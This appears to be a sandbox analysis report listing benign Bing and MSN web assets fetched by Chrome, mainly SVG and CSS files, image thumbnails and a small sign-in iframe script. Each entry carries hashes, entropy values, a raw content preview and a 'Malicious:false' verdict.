                                                                                                                                                                                                                                                                        MD5:2905CC3AA3AB7208BD9AF9581AA1CE20
                                                                                                                                                                                                                                                                        SHA1:60550C9A64AA30B6854D3ABD78A97B66C0373274
                                                                                                                                                                                                                                                                        SHA-256:4672742CAE6C61A00A6DFB9935FA36BBC04644C056605EC1F12643E869D32F46
                                                                                                                                                                                                                                                                        SHA-512:7DC764B7FEF18E2AF8150F220ADD6AD832057320DB9F3DCE44E8515C3984E84F7473B6C397E615F0F76D935F177577D51FD80E0DD65137B3E44BAD110C9EB7CA
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:<style type="text/css">#sbiarea,#sbicom{display:none}.hassbi #sbiarea{display:inline-block}#sbiarea{margin:0 0 0 18px}.sbox #sb_form #sbiarea{margin:0}#sb_sbi{display:inline-block;cursor:pointer}img#sbi_b{vertical-align:-2px;height:20px;width:20px}#detailPage #detailheader img#sbi_b,.blue2#miniheader img#sbi_b,.sbox img#sbi_b{vertical-align:-3px}.blue2#miniheader img#sbi_b{vertical-align:-1px}#sbi_b.grayscaled{filter:grayscale(1) brightness(1.4);-webkit-filter:grayscale(1) brightness(1.4)}#sbi_b.grayscaled:hover{filter:grayscale(1) brightness(1);-webkit-filter:grayscale(1) brightness(1)}#sb_sbip[shdlg] #sbi_b{filter:grayscale(0);-webkit-filter:grayscale(0)}#sb_sbip .rms_iac{display:inline-block}#sb_sbip:not(.disableTooltip):hover::before,#sb_sbip.shtip:not(.disableTooltip)::before,#sb_sbip[vptest]::before{bottom:-27px;left:10px;z-index:6}#sb_sbip:not(.disableTooltip):hover::after,#sb_sbip.shtip:not(.disableTooltip)::after,#sb_sbip[vptest]::after{top:40px;left:10px;z-index:4}#hp_contain
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):2913
                                                                                                                                                                                                                                                                        Entropy (8bit):5.210753142735573
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:TS9ldcFHMDcldcFHMDMLgldcFHMDMLO3RlpH//LwgZFLZq2LSHtRjVMHtnhw9MHh:wdcFU2dcFUtdcFUJI1SngMV
                                                                                                                                                                                                                                                                        MD5:149EE3CBE1BE0EE49920FDAD16764415
                                                                                                                                                                                                                                                                        SHA1:B1D49A73FCD0C3980B32F3C8EB5C4A9855923F57
                                                                                                                                                                                                                                                                        SHA-256:3D6C8EFB4E185EBD336CF879F8147B74A4DC41D142C8CEB973D676DCA180DE04
                                                                                                                                                                                                                                                                        SHA-512:4524F0BDB1FBFD9C2147FA7BA286234BD73A84CCD74CC94B6D1E087F0F03497460CE2BDEB1CA5237777C90286EC2CFBC36E1EAC96248BABE4C948053D1A6B371
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://assets.msn.com/weathermapdata/1/static/weather/Icons/taskbar_v10/Condition_Card/CloudyV3.svg
                                                                                                                                                                                                                                                                        Preview:<svg width="72" height="72" viewBox="0 0 72 72" fill="none" xmlns="http://www.w3.org/2000/svg">.<path fill-rule="evenodd" clip-rule="evenodd" d="M13.5 58H34.5H36H55.5C64.6127 58 72 50.6127 72 41.5C72 32.3873 64.6127 25 55.5 25C55.1382 25 54.7791 25.0116 54.4231 25.0346C50.6566 17.879 43.1481 13 34.5 13C23.6003 13 14.5107 20.7504 12.4418 31.0409C5.48057 31.5806 0 37.4003 0 44.5C0 51.9558 6.04416 58 13.5 58Z" fill="#E7F1FF"/>.<path fill-rule="evenodd" clip-rule="evenodd" d="M13.5 58H34.5H36H55.5C64.6127 58 72 50.6127 72 41.5C72 32.3873 64.6127 25 55.5 25C55.1382 25 54.7791 25.0116 54.4231 25.0346C50.6566 17.879 43.1481 13 34.5 13C23.6003 13 14.5107 20.7504 12.4418 31.0409C5.48057 31.5806 0 37.4003 0 44.5C0 51.9558 6.04416 58 13.5 58Z" fill="url(#paint0_linear_582_42049)"/>.<path fill-rule="evenodd" clip-rule="evenodd" d="M13.5 58H34.5H36H55.5C64.6127 58 72 50.6127 72 41.5C72 32.3873 64.6127 25 55.5 25C55.1382 25 54.7791 25.0116 54.4231 25.0346C50.6566 17.879 43.1481 13 34.5 13C23.6003 13
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):27050
                                                                                                                                                                                                                                                                        Entropy (8bit):5.311910726386856
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:Ju5HpoedXBkzeBPaMZFbIf3NGvRgr32YPGeCxfRPPOqbgoMmb+KAYpHYs7+x:J6xtBkzeoM/biGg9GecwKgoMmNp4s7+x
                                                                                                                                                                                                                                                                        MD5:6766470B95D42D3B8AB4CF543FA49BD2
                                                                                                                                                                                                                                                                        SHA1:DC905CDF6875CD8BB69CA94385934E2683884DB5
                                                                                                                                                                                                                                                                        SHA-256:CDA368A18C96F2E11242E0463B1A5E55D91994E41DA38B41F9C82C0C20A55102
                                                                                                                                                                                                                                                                        SHA-512:9902C88A12CC9A9AB397AF420D56EEE82A9D3FBB75E38EA3D62FECF18D479B1FE23DA3975C0593FD0FB70367C6ED2778130BFDA6A2FE23530806502E27ECB391
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://assets.msn.com/weathermapdata/1/static/logo/ms-start-logo-white.svg
                                                                                                                                                                                                                                                                        Preview:<svg width="45" height="14" viewBox="0 0 45 14" fill="none" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">.<rect width="45" height="14" fill="url(#pattern0)"/>.<defs>.<pattern id="pattern0" patternContentUnits="objectBoundingBox" width="1" height="1">.<use xlink:href="#image0_51_2339" transform="matrix(0.000879864 0 0 0.00282813 -0.2438 -0.774074)"/>.</pattern>.<image id="image0_51_2339" width="1704" height="901" xlink:href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABqgAAAOFCAYAAAAWJGOCAAAACXBIWXMAAC4jAAAuIwF4pT92AAAgAElEQVR4nOzdTXIcR5Yu0HCZxl2oFRTUGyhoBQQn/YaE5s+MwApIroDkCkCuAJBZzwkNX08IroDQBprQCoTqDfizoG6qUyB+8ifcwyPyHDOa1GoyEfD0DLDuF/d6BwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                                                        Entropy (8bit):7.297687791356906
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:6v/7PHK5vmTHief+oUXQzBw0Kqp90+JZ8WDJhg0XYkDBwOY:Mq5vmxf+oUXQlvxT0+JHNztY
                                                                                                                                                                                                                                                                        MD5:BDB31A2F26EA362FB3CF71D59021BA62
                                                                                                                                                                                                                                                                        SHA1:7CD518B87EBEBEA1694D08EB79C66531B2806715
                                                                                                                                                                                                                                                                        SHA-256:5EC6996DFBC761C63BC244CE4ADC104541E399DB02D9EDBDF673450CEBA75A2E
                                                                                                                                                                                                                                                                        SHA-512:8A92C8746DC103C5BE51A807984E126DE65CDD231989AD929FAD052E3BE66543726CC2B045B6E5673A62BEEBDED1B9E0D4959A55158489E4EB8ABE5F812903CD
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR................a....pHYs..........+......IDATx..R..AQ.].........U..F..z.@..$.....9..F".....B.o...5ss.=87.;..k..Y.=3..ax.h4B.T".f2..X,..d4J.\....Bc.....4..5S.6J&g$... .l6.j..*..;....z..dRRR..r..F..@ .|>/.^A".......*....0..hT.O..V.U..f.`..B.......-.z..^/<..N....d.\.........a,.K....!...^....x.Z<..b.d2.-c.X4....#.J.-.6J..l0......V..f..&...~*8.........zS....r..<.P(......n..n.....N.}..o.....v.!4.x<.|>G6...`..j.x...s.S2.R.2.Q#{.....v...q<.q..`.X$g..y..N..2.._....IEND.B`...............
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1362
                                                                                                                                                                                                                                                                        Entropy (8bit):4.764409764786972
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:6v/7GbP+J5W457HOsjgkhoDWcpHL2/t57qiWa8ZT1a+1pbHiehxNpBNsA/:3bPb45Ukh7cpr2/tEfaoRVjdsa
                                                                                                                                                                                                                                                                        MD5:F5A837F815886D5BB0AA47AFD8D416C0
                                                                                                                                                                                                                                                                        SHA1:D53FE6FA5B387C1464400E9DFA74D2629578FDC0
                                                                                                                                                                                                                                                                        SHA-256:78F43709977245B6239D816A09FFE0B68BACEC488F15618CA0CE66A002C5A472
                                                                                                                                                                                                                                                                        SHA-512:292CB59926DB7D811738F6E3F380AFBE8C7EE0016D468B9F51E876714C6A00995C0CF5B2CC084A9F07389ABC9306FB2471915E0635B5054A69598C9047AA12B9
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR................a....pHYs..........+.....kIDATx..OH.q..?..ss..e..\9m...i...Q.&.H^....:..<u...Ix.:DP..3.<.......P4.J.ej..... .../=.......<.-....F.D@.....G..FU~!6...&.I...b.5.....GA...N....|.(.....r......M=.T....J<.34.z....~=A...P..MH..ZQ..q.tK..w..>7F..b.(....3..2...X.....c.T.-V..+%y.^4C_...aOB......PXZ.cM..!)..9...lIO.zV..I.........AtV....9..+.P..e[.u..h....#7d....@...}....|.}D.9.)4.)B&<...Fw.....a.K..%...i. ....9..^...x.z0M..##..#.3..l.4.dR#...t2.'.F".t.......|.)....s..f....{h?VYbz.Q..e.mu..?......T..E8.A...y.y..?:.k.%i.4e..c........g$C*i1......OYDeu.d...KB..Mg.M..~....J..j`G.n'3......u.^..3J.f..~O..>x..H....p.hm.M....2.......U.6....IEND.B`................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 186x88, components 3
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):5235
                                                                                                                                                                                                                                                                        Entropy (8bit):7.915838822311368
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:8zgEtzKiyw9ewk7gBzP3RovWzNb9tXf5oWR9cqkv/+:ygizKi/ewkMP3Cuz/9x9ae
                                                                                                                                                                                                                                                                        MD5:822F9E47D1941C96DE090670D5E49FF6
                                                                                                                                                                                                                                                                        SHA1:A9B3C7E3B73B208F74062E86ACA4747B47489608
                                                                                                                                                                                                                                                                        SHA-256:EDBC6B8400D9666772758F4254BA667CF671398C697F1954DE81CEB324B140B0
                                                                                                                                                                                                                                                                        SHA-512:DB1F05F74BCD99F39660BA9B077456F33720D3B6821F55A5ED0584EA416F5578389ED64AAB0DBEA7D33D22A5205C8F435104C1F28621D0FEAC740DF079710319
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://www.bing.com/th?id=OPN.RTNews_NC-OprYXrwzIWe0YQY-_SQ&w=186&h=88&c=7&rs=2&qlt=80&pid=PopNow
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C.....................................'!..%..."."%()+,+. /3/*2'*+*...C...........*...**************************************************......X...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..-.-..6..S..E;KCr....=iZ..q..|.y..5......2lI.e.t.U...,r}k.O..........:4....(9'.?...^hl......jORN.}..4}..L.Kte.....zS..;W?.{.^.9F..#.."C...F...3..F.2..(.G.&.u......v5hD,F".I*0=.....1...}ou...Ko.ls.I..5.}......."msJ../%......uX......ap.._[J.2.&R..S...u.w_._.m&.~.p..^....?.iC...........c.4/i%xD.a......;..uB.V.E..a...U&..F>....k....u..v..".......u.&...0G
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, software=GIMP 2.10.8, datetime=2019:07:31 17:59:08], progressive, precision 8, 160x160, components 3
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):5944
                                                                                                                                                                                                                                                                        Entropy (8bit):7.819206752415454
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:sUbkQe7dQVaRFmwmIE1KFxQ5JKPxCLNO8XrhNOyYSIyQ3DEmISwnFlE6NlG:s+od96rIE1KRCLHXl4DPzEmISwFlE6Nc
                                                                                                                                                                                                                                                                        MD5:F6E70DA298349AD94215F0B4A6875037
                                                                                                                                                                                                                                                                        SHA1:96F08A674EDB118B6862663ADA27CCCD56B44481
                                                                                                                                                                                                                                                                        SHA-256:68B6356BA9F37FF17EAE98BC094A493075F83D446B1E88F1ED32C2926E72E76C
                                                                                                                                                                                                                                                                        SHA-512:AFA16D89B1395F1318F42757F9451553F425539087E2EE40EC9FB14EC1FEB0C80254252951472ACC4AB8D4245E53E75F2C43FE41DAF9EC7DA8526C2F7B669BD4
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...............J...........R...(...........1.......Z...2.......f.......H.......H.......GIMP 2.10.8.2019:07:31 17:59:08....C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;.........................................................................................h......................E..T..r..D........@..H.F&....`5.e.%...."..U@C.r.e...5.-.`4".[.`.1C.$)..pZ.".;. .(..w...x.f..*sU[....Y..<.:...b..=+.........n\.b)sv/4^`-.kN.;.v..X....Z......#_...N.....j..4.\......T..,.....B..&..L....^LcJ.KA.=....!iEY...!N....Z.:.d.i..F..d...sP.w=<..59]O..u.?..3...]i....F...C.X...[M..z..<...k..rL.UYr.jz.@ sTf..D8,5.+..<jWr..oL...<H.k;.A I.k)...'.y.j.uZ.,4......(.\HH.ByC..*1.jt.X...Z.......w......`.v.TZ.M.f.J.}.F.e..Te.-N@S...+.].\..u-9..Xg* .B.[M.$..'.ry....Zf...CV.D...S...65 `mH@#.j[.y."...r ).5.B\.o...B...Ee..Q@....,..)..u#..i.j.jAsT...[J.c_...'.....................
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1248
                                                                                                                                                                                                                                                                        Entropy (8bit):4.794006986210145
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:6v/7FKUjCpiCOvfHhAqbCqzald1uVyjq0nc91fSn62gg:INvfygBQdggWuM1qdg
                                                                                                                                                                                                                                                                        MD5:4CA14D11E247672836C5BF5C1D7BC0B8
                                                                                                                                                                                                                                                                        SHA1:7AB5A1DA7702D2413FF7AA69E900EA0CD61B85F2
                                                                                                                                                                                                                                                                        SHA-256:9CDCCFE1364E044C501EBAFFAC0E46F04309AA8FB8E647000784238B49E64273
                                                                                                                                                                                                                                                                        SHA-512:17C2E87F1EEFD769B6270CBC27022C998EF30A595AB01331A056ABBBB3C517A2BA6CF9116C3F82FCA10C6F92D5434C0DEB94DBAF9AA09A84EA150A8D40B459A4
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR................a....pHYs..........+.....2IDATx...]H.Q...m..6.m"Y..-..3...%TDb..B..E.MaHA....(.D."*....]...t..u......>..2t..].0[.o.9.{.....?..[>.......f..rN].G....s............C&I...".....w.(..\.BF..Mu.t...;.z..l...$=r. .HH6.-". ..<.^/..[.q....Cm..,..+...c.......1.sGj.u.^W"U.8.....Q*....|.U.k1.u.u..m.cX\4.8.....N......o0.....D.~q`....].K..F.._.i^6[..(..$K..]...;,).gz.`$....GO...:./........A8.J'..Ymgn..Ki....P.!*....K\f.p[...v..E.O...7]!H.....5+....$Z...Y.0.w....+..V..j5.?yY.E`kf....fRd<.....+.....D..&..........pv.)3F.....=...9'C.{.R..7.aL.~.%K.}../..9}~._c.`...2...&...}....IEND.B`.........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, software=GIMP 2.10.8, datetime=2019:08:01 11:43:45], progressive, precision 8, 160x160, components 3
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):3814
                                                                                                                                                                                                                                                                        Entropy (8bit):7.634659202076907
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:sQrbnTt8ATpTToooX6l4d309BEEGp0m1amWth0x/aA+9GnPoYXEcX:sS8AyJKl4xV0KamWtOb+SP0cX
                                                                                                                                                                                                                                                                        MD5:281570611F89219A970F2589F98A09DB
                                                                                                                                                                                                                                                                        SHA1:9E2DCCC8A295BBDA4AD12818EA06FA67634E1A98
                                                                                                                                                                                                                                                                        SHA-256:7BDAB4155253E159B748E2BE6CB1C0AF736F18D2A4DBDDF79D93D6219A3DE9DD
                                                                                                                                                                                                                                                                        SHA-512:FB9CAEE5B3FF8A3CE8C4D6D066CC0283A8A158E32131754CD9EFB1B4A25303CAA72FAE11C23E836B2A2F0D5005F0E39EB2A38D1D28CB81CAE5C1C818D77B80FB
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...............J...........R...(...........1.......Z...2.......f.......H.......H.......GIMP 2.10.8.2019:08:01 11:43:45....C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......................................................................................... .. ..... .. .. ..$................H.............. ..$..H .. .....AY .....: ...P$..$.. .tXAI ......@....9..I...Rt....f$.Z....+..,.. .t@1.Q.O=..3.l.#.v..1gZ,...[..A&.y.....j....=-.{.[.....5t.y.q..T..t.UY...Z.,..]....{...bI<.4`..<].m'...D..9.......z5.....0G..U.b.e.qn6k7cwo......1G=......)n..g..1.vZ...jIu..9.c.uo=..>...r..-......2..g.V.Z\.{.^c:..Jj.uY....5-."V...?...(......................!..".. .12#0@ABp...............>.....n..>..z..z..n.' .\.J.-...u#.....c~.@d.......|./..g..v....#..:a_....p=$Z.%.3..SN.G..Hi..*_.W........L.........$.?..p_.w. ..e.h..A..9.-[..n.F.......Q.. .2.
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):1065
                                                                                                                                                                                                                                                                        Entropy (8bit):4.58625494968845
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:ttMD4XW6zQpmgG5fYQpmgG5j4zFQZcSXWEcoqRQ:HRSm/Nvm/CIXWW
                                                                                                                                                                                                                                                                        MD5:B3199E6BAF6D264405C122BF5EBE64A0
                                                                                                                                                                                                                                                                        SHA1:EE1B56CEA599BFC1921C96885B585A6ACF523531
                                                                                                                                                                                                                                                                        SHA-256:BBA51407483F3DECBA29C8D3398AC6F244B415BE04055123775C4A428CFDFDDC
                                                                                                                                                                                                                                                                        SHA-512:5CB6654495A14595BCE84C0AA6C26FDFBE0E44E0E44DB703392641F772D26B4C6835501EEB5410CBBE6D882A3199795A812782472BED5A8A8D951CB56237B007
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/7htWzqWZv8GSHJaIW1haas9SNTE.svg
                                                                                                                                                                                                                                                                        Preview:<svg enable-background="new 0 0 64 48" viewBox="0 0 64 48" xmlns="http://www.w3.org/2000/svg"><path d="m59.5.5h-27.5v47h27.5c2.209 0 4-1.791 4-4v-39c0-2.209-1.791-4-4-4z" fill="#111"/><path d="m4.5.5h27.5v47h-27.5c-2.209 0-4-1.791-4-4v-39c0-2.209 1.791-4 4-4z" fill="#fff"/><path d="m4.5.5h55c2.209 0 4 1.791 4 4v39c0 2.209-1.791 4-4 4h-55c-2.209 0-4-1.791-4-4v-39c0-2.209 1.791-4 4-4z" fill="none" stroke="#ccc"/><path d="m14 14h-6c-1.105 0-2-.895-2-2v-4c0-1.105.895-2 2-2h6c1.105 0 2 .895 2 2v4c0 1.105-.895 2-2 2z" fill="#106ebe"/><path d="m34 36h-26c-1.105 0-2-.895-2-2v-14c0-1.105.895-2 2-2h26c1.105 0 2 .895 2 2v14c0 1.105-.895 2-2 2z" fill="#c4c4c4"/><path d="m24 14h29c2.209 0 4-1.791 4-4s-1.791-4-4-4h-29c-2.209 0-4 1.791-4 4s1.791 4 4 4zm31 4h-14c-1.105 0-2 .895-2 2s.895 2 2 2h14c1.105 0 2-.895 2-2s-.895-2-2-2zm0 7h-14c-1.105 0-2 .895-2 2s.895 2 2 2h14c1.105 0 2-.895 2-2s-.895-2-2-2zm0 7h-14c-1.105 0-2 .895-2 2s.895 2 2 2h14c1.105 0 2-.895 2-2s-.895-2-2-2zm0 7h-47c-1.105 0-2 .895-2 2s.
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (576), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):576
                                                                                                                                                                                                                                                                        Entropy (8bit):5.192163014367754
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:9mPi891gAseP24yXNbdPd1dPkelrR5MdKIKG/OgrfYc3tOfIvHbt:9mPlP5smDy1dV1dHrLMdKIKG/OgLYgtV
                                                                                                                                                                                                                                                                        MD5:F5712E664873FDE8EE9044F693CD2DB7
                                                                                                                                                                                                                                                                        SHA1:2A30817F3B99E3BE735F4F85BB66DD5EDF6A89F4
                                                                                                                                                                                                                                                                        SHA-256:1562669AD323019CDA49A6CF3BDDECE1672282E7275F9D963031B30EA845FFB2
                                                                                                                                                                                                                                                                        SHA-512:CA0EB961E52D37CAA75F0F22012C045876A8B1A69DB583FE3232EA6A7787A85BEABC282F104C9FD236DA9A500BA15FDF7BD83C1639BFD73EF8EB6A910B75290D
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:var SsoFrame;(function(n){function t(n){if(n&&n.url&&n.sandbox){var t=sj_ce("iframe"),i=t.style;i.visibility="hidden";i.position="absolute";i.height="0";i.width="0";i.border="none";t.src=decodeURIComponent(n.url);t.id="aadssofr";t.setAttribute("sandbox",n.sandbox);_d.body.appendChild(t);n.currentEpoch&&sj_cook.set("SRCHUSR","T",n.currentEpoch,!0,"/");Log&&Log.Log&&Log.Log("ClientInst","NoSignInAttempt","OrgId",!1)}}function i(n){try{n&&n.length===2&&t(n[1])}catch(i){}}n.createFrame=t;n.ssoFrameEntry=i;sj_evt.bind("ssoFrameExists",i,!0,null,!1)})(SsoFrame||(SsoFrame={}))
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x225, components 3
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):22075
                                                                                                                                                                                                                                                                        Entropy (8bit):7.969149004753472
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:eRhKc6ypnwDy7DebDjmphG1az6UxWunQTQe3mH8b/xCArutzq9JL6JXbMlwnusU:eRhKjypnwDy7DePajGg6WEVb5CAa9rw7
                                                                                                                                                                                                                                                                        MD5:6CF532483B6488C4F6F10E4FC1307441
                                                                                                                                                                                                                                                                        SHA1:62340CC000BEC6923189B4CE3EAA4A02E6EC0373
                                                                                                                                                                                                                                                                        SHA-256:F70D873FA327B7ABEC95D5D396496B05D3A1E34A9AF2066EC5A67E6047654B4C
                                                                                                                                                                                                                                                                        SHA-512:1773A935206561841E0A9924FD495F831966F55A3920319A35DF843102776B2CB73607A1A97983033C9D77EB988E4F6D63C2EFE919DC93DECC619124A2F46608
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://th.bing.com/th?id=ORMS.adde30357236ecb40919acb4e96f678c&pid=Wdp&w=300&h=225&qlt=90&c=1&rs=1
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C....................................................................C.........................................................................,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....8Z.$|..7.j..m._K)4....M..3G.hX>).S...\KY.#T.Yv..|..Z.4.>l.O..s.Vu..ML..Q.U.....=..a.....PB~z|......Z.. r.~..]..E.."....Z....`.k ....J.#.\7.6.m...6r..@6.+..Zf..h.~.......y.._..h....c".. .:.s...S........mf....5..........8x.....EmG:......{.........P.<..m'.....M!6;q'.I...?Za`O...K...[....."..4...j&.DwR....h'...2V..n<.....2.E........iW....R2...W...3XM
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 186x88, components 3
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):5146
                                                                                                                                                                                                                                                                        Entropy (8bit):7.92054723869336
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:8zgEoMqRxjovgeSOpNWSfGV6Qmju0QJykNG3zovmsioGSynLa3EGw7b:ygrMMjoYedpNdGV6Qdl3Jv5ioj8232/
                                                                                                                                                                                                                                                                        MD5:68DF420997E2171DB09B8B51A7166C17
                                                                                                                                                                                                                                                                        SHA1:5590419B8B319719D3A96FB3D8AA9E6B356BC5D3
                                                                                                                                                                                                                                                                        SHA-256:BA22C0CDE79E23E03D86C0494AB85AB987600412A50E2B6EE629602254148938
                                                                                                                                                                                                                                                                        SHA-512:315BD18CD4EC14BCD1D29DF501A3BA3000BE22D0D55B603401F16F519C8883E830512151568CF4D2D70F79EA2E1D0D9C1C8F1213286241C77FF4542BF8B9E3A9
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
